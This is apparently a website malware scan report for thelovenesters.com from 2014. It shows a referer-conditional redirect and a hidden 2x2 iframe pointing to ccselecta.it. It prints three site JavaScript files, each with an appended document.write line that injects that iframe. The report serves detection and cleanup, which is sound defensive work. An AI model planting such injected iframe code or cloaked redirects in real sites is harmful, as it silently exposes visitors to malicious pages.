Malicious/Suspicious Redirects
Request | Server response | Status |
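URL: http://thelovenesters.com/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: thelovenesters.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 08:22:25 GMT Location: http://ccselecta.it/hwed.html Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8 Content-Length: 392 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: this 302 was returned to a request carrying a search-engine Referer, while the scan of the same URL listed below returned 200 OK, which suggests the redirect is conditional; when verifying a cleanup, re-test with a search-engine Referer as well as without one.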
Scanned pages/files
Request | Server response | Status |
http://thelovenesters.com/ | 200 OK Content-Length: 2165 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery.js | 200 OK Content-Length: 57399 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
[… excerpt truncated in this report …]
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery.corner.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://thelovenesters.com/test404page.js | 404 Not Found Content-Length: 510 Content-Type: text/html | clean |
http://thelovenesters.com/js/colorbox.js | 200 OK Content-Length: 9174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",q="on",n="x";function e(a,c){a=a?' id="'+k+a+'"':"";c=c?' style="'+c+'"':"";return b("<div"+a+c+"/>")}function p(a,b){b=b===n?m.width():m.height();return typeof a==="string"?Math.round(a.match(/%/)?b/100*parseInt(a,10):parseInt(a,10)):a}function Q(c){c=b.isFunction(c)?c.call(h):c;return a.photo||c.match(/\.(gif|png|jpg|jpeg|bmp)(?:\?([^#]*))?(?:#(\.*))?$/i)}function cb(){for(var
[… excerpt truncated in this report …]
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/scripts.js | 200 OK Content-Length: 1924 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
function lnch_p(mywidth,myheight,page,name) {
myleft = (screen.width - mywidth) / 2; mytop = (screen.height - myheight) / 2; w = window.open(page,name,'width='+mywidth+',height='+myheight+',scrollbars=1,resizable=1,menubar=0,toolbar=0,status=0,location=0,directories=0,left='+myleft+',top='+mytop); if (w.focus) w.focus(); } $(document).ready(function(){ $("#nav ul li").mouseenter(function(){ var id = $(this).attr("id"); }); $("#nav ul li").mouseleave(function(){ var id = $(this).attr("id"); $("#nav ul #"+id+" ul").css("display","none"); }); }); if(typeof sIFR == "function"){ };
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery_style.js | 404 Not Found Content-Length: 514 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thelovenesters.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thelovenesters.com/
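Result: thelovenesters.com is not infected or malware details are not published yet.
Result: thelovenesters.com is not infected or malware details are not published yet.
Note: a "not listed" result reflects only the state of each blacklist at query time; it does not override the redirect and hidden iframe findings reported by this scan.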